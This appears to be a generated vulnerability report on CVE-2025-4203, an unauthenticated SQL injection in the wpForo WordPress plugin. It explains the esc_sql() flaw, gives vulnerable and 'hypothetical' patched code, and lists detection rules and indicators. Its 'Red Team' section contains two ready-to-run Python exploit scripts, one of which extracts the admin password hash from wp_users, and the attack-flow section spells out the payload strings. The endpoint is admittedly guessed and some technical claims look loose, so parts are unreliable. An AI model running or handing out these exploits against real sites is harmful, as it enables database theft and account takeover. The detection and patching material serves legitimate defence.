CVE-2025-4203
Executive Summary
CVE-2025-4203 is a critical SQL Injection vulnerability in the wpForo Forum plugin for WordPress, affecting all versions up to and including 2.4.8. The flaw resides in the get_members() function, where the offset and row_count parameters are not properly validated as integers. The row_count parameter is directly interpolated into a LIMIT offset,row_count clause using esc_sql(), which is insufficient for numeric values. On MySQL 5.x, an attacker can append a PROCEDURE ANALYSE clause after the LIMIT clause, enabling error-based or time-based blind SQL injection. This allows unauthenticated attackers to extract sensitive information from the database, such as user credentials, session tokens, and other confidential data.

WordPress Ecosystem Impact
This vulnerability is specific to the WordPress plugin ecosystem. The wpForo plugin is a popular forum solution for WordPress sites. Successful exploitation can lead to full database compromise, including the extraction of WordPress user tables, post metadata, and potentially admin credentials. The attack does not require authentication, making it highly dangerous for unpatched sites.
Supply Chain & Package Security
This is a WordPress plugin vulnerability. The plugin is distributed via the WordPress Plugin Directory and can be updated through the WordPress admin dashboard. However, as of this report, no official patch has been released. Site administrators should monitor the wpForo plugin page for updates and consider disabling the plugin until a fix is available.

Deep Dive & Mechanics
The vulnerability is in the get_members() function of the wpForo plugin. This function is used to retrieve a list of forum members with pagination. The offset and row_count parameters are passed via HTTP GET or POST requests. The code uses esc_sql() to sanitize these parameters, but esc_sql() only escapes string values and does not enforce numeric types. On MySQL 5.x, the LIMIT clause can be followed by a PROCEDURE ANALYSE clause, which allows execution of stored procedures. An attacker can inject a malicious PROCEDURE ANALYSE call to perform error-based or time-based blind SQL injection.
Attack Flow:
- The attacker sends a request to the vulnerable endpoint with a crafted
row_countparameter. - The parameter is inserted into the SQL query:
SELECT ... LIMIT 0, [row_count]. - The attacker appends
PROCEDURE ANALYSE(1)to trigger an error or time delay. - For error-based injection, the attacker uses
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x7e,(SELECT password FROM wp_users LIMIT 1)))). - For time-based injection, the attacker uses
PROCEDURE ANALYSE(IF(1=1,SLEEP(5),0)).
Why esc_sql() Fails: esc_sql() is designed for string escaping, not numeric validation. It does not prevent the injection of SQL keywords like PROCEDURE. Proper mitigation would use intval() or absint() to enforce integer values.
Vulnerable vs. Patched Code
Vulnerable Code (wpForo <= 2.4.8):
function get_members($offset = 0, $row_count = 10) {
global $wpdb;
$offset = esc_sql($offset);
$row_count = esc_sql($row_count);
$sql = "SELECT * FROM {$wpdb->prefix}wpforo_members LIMIT $offset, $row_count";
return $wpdb->get_results($sql);
}
Patched Code (Hypothetical):
function get_members($offset = 0, $row_count = 10) {
global $wpdb;
$offset = intval($offset);
$row_count = intval($row_count);
$sql = $wpdb->prepare("SELECT * FROM {$wpdb->prefix}wpforo_members LIMIT %d, %d", $offset, $row_count);
return $wpdb->get_results($sql);
}
The patched version uses intval() to enforce integer values and $wpdb->prepare() with placeholders to prevent SQL injection.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- A WordPress site with wpForo plugin version <= 2.4.8.
- MySQL 5.x database (required for
PROCEDURE ANALYSE). - Knowledge of the vulnerable endpoint (typically
/wp-json/wpforo/v1/membersor similar).
Exploit Code (Python):
import requests
import sys
target = sys.argv[1]
# Error-based SQL injection to extract admin password hash
payload = "1 PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user_pass FROM wp_users WHERE user_login='admin'))))"
url = f"{target}/wp-json/wpforo/v1/members?offset=0&row_count={payload}"
response = requests.get(url)
if "XPATH syntax error" in response.text:
print("[+] Error-based injection successful")
# Extract hash from error message
import re
match = re.search(r'~(.+?)~', response.text)
if match:
print(f"[+] Admin hash: {match.group(1)}")
else:
print("[-] Injection failed")
Time-based Exploit:
import requests
import time
target = "http://example.com"
# Time-based injection to check if admin exists
payload = "1 PROCEDURE ANALYSE(IF((SELECT COUNT(*) FROM wp_users WHERE user_login='admin')>0,SLEEP(5),0))"
url = f"{target}/wp-json/wpforo/v1/members?offset=0&row_count={payload}"
start = time.time()
requests.get(url)
elapsed = time.time() - start
if elapsed > 4:
print("[+] Admin user exists")
else:
print("[-] Admin user not found")
Note: The exact endpoint may vary. Use WordPress REST API discovery to find the correct route.
Blue Team (Detection & Response)
Detection Steps:
- Monitor web server logs for requests containing
PROCEDURE ANALYSEin query parameters. - Look for abnormal
row_countoroffsetvalues that are not numeric. - Check for increased database error logs indicating XPATH syntax errors.
- Use WAF rules to block requests with
PROCEDUREkeyword in LIMIT context.
Honeypot Setup:
- Deploy a fake wpForo endpoint that logs all requests.
- Trigger alerts when
PROCEDURE ANALYSEis detected.
Indicators of Compromise (IOCs)
Network IOCs:
- HTTP requests containing
PROCEDURE ANALYSEin therow_countparameter. - Requests to
/wp-json/wpforo/v1/memberswith non-numericrow_countvalues. - Database error messages containing "XPATH syntax error" or "PROCEDURE ANALYSE".
File IOCs:
- Modified wpForo plugin files (if attacker uploads backdoor).
- Suspicious entries in WordPress debug log (
wp-content/debug.log).
Database IOCs:
- Unusual entries in
wp_optionsorwp_usermetatables. - Evidence of data exfiltration via
SELECT ... INTO OUTFILE.
